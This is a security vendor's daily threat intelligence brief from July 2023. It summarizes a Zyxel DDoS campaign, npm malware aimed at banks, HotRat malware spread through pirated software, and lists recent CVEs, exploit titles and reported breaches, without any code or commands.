ZeroFox Daily Intelligence Brief - July 24, 2023
|by Alpha Team
ZeroFox Daily Intelligence Brief - July 24, 2023
ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Please find today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Unpatched Zyxel Vulnerability Exposes Organizations to Persistent DDoS Attacks
- Malware Targeting Banks via Open Source Supply Chain
- AsyncRAT Variant Malware HotRat Spreading Through Pirated Software
- Data broker / initial-access broker / NulledBB: Actor Shares 253,000 Compromised Email Accounts and HackForums: Actor Selling Student Email Accounts for Amazon Prime
- Vulnerabilities: CVE-2023-28133 and CVE-2023-3850
- Exploits: CVE-2020-10220 and CVE-2012-4869
- Breaches: Telegram: OnionLABS Botnet Breach and Credit Card Data Breach
Unpatched Zyxel Vulnerability Exposes Organizations to Persistent DDoS Attacks
Organizations that have yet to patch a critical 9.8-severity vulnerability in Zyxel network face a serious threat. The flaw, which was patched by Zyxel on April 25 2023, continues to be exploited by threat actors, who use compromised devices to launch DDoS attacks. Despite warnings from security experts, many vulnerable Zyxel firewalls and VPN servers remain exposed, leading to a surge in exploit activity.
Malware Targeting Banks via Open Source Supply Chain
Threat actors were observed attempting to introduce malware into the software development environment of two banks via poisoned packages on the Node Package Manager (npm) registry. The attacks involved advanced techniques, including attaching malicious functionalities to specific components on the victim banks' websites. The malicious packages could execute second-stage payloads, potentially providing attackers access to the banks' networks and sensitive data.
AsyncRAT Variant Malware HotRat Spreading Through Pirated Software
A new variant of the AsyncRAT malware called HotRat is being distributed through pirated versions of popular video games, image and sound editing tools, and Microsoft Office installers. HotRat enables attackers to steal login credentials, cryptocurrency wallets, and perform various malicious activities like screen capturing and keylogging. The attacks involve bundling cracked software with a malicious AutoHotkey script and employing a Visual Basic Script loader to deploy the HotRat payload. However, this attack requires administrative privileges to succeed.
THREAT ACTIVITY: INITIAL-ACCESS BROKERS, DATA BROKERS, AND HACKTIVISTS
- NulledBB: Actor Shares 253,000 Compromised Email Accounts
- HackForums: Actor Selling Student Email Accounts for Amazon Prime
VULNERABILITIES
- CVE-2023-28133 - Local privilege escalation in Check Point Endpoint Security Client (version E87.30) via crafted OpenSSL configuration file
- CVE-2023-3850 - A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical.
EXPLOITS
- CVE-2020-10220: Rconfig 3.x - Chained Remote Code Execution (Metasploit)
- CVE-2012-4869: FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)
BREACHES
- Telegram: OnionLABS Botnet Breach (23,991 Records) Email address and password
- Credit Card Data Breach: (4c7f4a | 2575)| Credit Card Data Breach
Tags: DIB, tlp:green